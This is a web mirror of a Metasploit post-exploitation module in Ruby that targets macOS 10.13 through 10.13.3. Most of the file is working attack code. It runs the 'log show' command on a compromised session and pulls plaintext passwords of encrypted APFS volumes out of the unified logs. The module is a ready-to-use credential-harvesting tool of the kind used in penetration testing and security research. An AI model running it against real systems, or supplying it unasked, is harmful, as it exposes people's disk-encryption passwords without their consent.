Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5
class MetasploitModule < Msf::Post

6


7
  def initialize(info = {})

8
    super(

9
      update_info(

10
        info,

11
        'Name' => 'Mac OS X APFS Encrypted Volume Password Disclosure',

12
        'Description' => %q{

13
          This module exploits a flaw in OSX 10.13 through 10.13.3

14
          that discloses the passwords of encrypted APFS volumes.

15


16
          In OSX a normal user can use the 'log' command to view the system

17
          logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS

18
          volume the password is visible in plaintext within these logs.

19
        },

20
        'License' => MSF_LICENSE,

21
        'References' => [

22
          [ 'URL', 'https://thehackernews.com/2018/03/macos-apfs-password.html' ],

23
          [ 'URL', 'https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp' ]

24
        ],

25
        'Platform' => 'osx',

26
        'Arch' => ARCH_ALL,

27
        'Author' => [

28
          'Sarah Edwards',  # earliest public discovery

29
          'cbrnrd'          # Metasploit module

30
        ],

31
        'SessionTypes' => [ 'shell', 'meterpreter' ],

32
        'DisclosureDate' => '2018-03-21',

33
        'Notes' => {

34
          'Stability' => [CRASH_SAFE],

35
          'SideEffects' => [],

36
          'Reliability' => []

37
        }

38
      )

39
    )

40
    register_options([

41
      # The command doesn't give volume names, only mount paths (current or previous)

42
      OptString.new('MOUNT_PATH', [false, 'The mount path of the volume to get the password of (Leave blank for all)', ''])

43
    ])

44
  end

45


46
  def check

47
    osx_version = cmd_exec('sw_vers -productVersion')

48
    return Exploit::CheckCode::Vulnerable if osx_version =~ /^10\.13[.[0-3]]?$/

49


50
    Exploit::CheckCode::Safe

51
  end

52


53
  def run

54
    if check == Exploit::CheckCode::Safe

55
      print_error('This version of OSX is not vulnerable')

56
      return

57
    end

58


59
    cmd = "log show --info --predicate 'eventMessage contains \"newfs_\"'"

60
    cmd << " | grep #{datastore['MOUNT_PATH']}" unless datastore['MOUNT_PATH'].empty?

61
    vprint_status("Running \"#{cmd}\" on target...")

62
    results = cmd_exec(cmd)

63
    vprint_status("Target results:\n#{results}")

64


65
    if results.empty?

66
      print_error 'Got no response from target. Stopping...'

67
      return

68
    end

69


70
    successful_lines = 0

71
    results.lines.each do |l|

72
      next unless l =~ /newfs_apfs(.*)-S(.*)$/

73


74
      print_good "APFS command found: #{::Regexp.last_match(0)}"

75
      successful_lines += 1

76
    end

77
    print_error 'No password(s) found for any volumes. Exiting...' if successful_lines.zero?

78
  end

79
end

80


81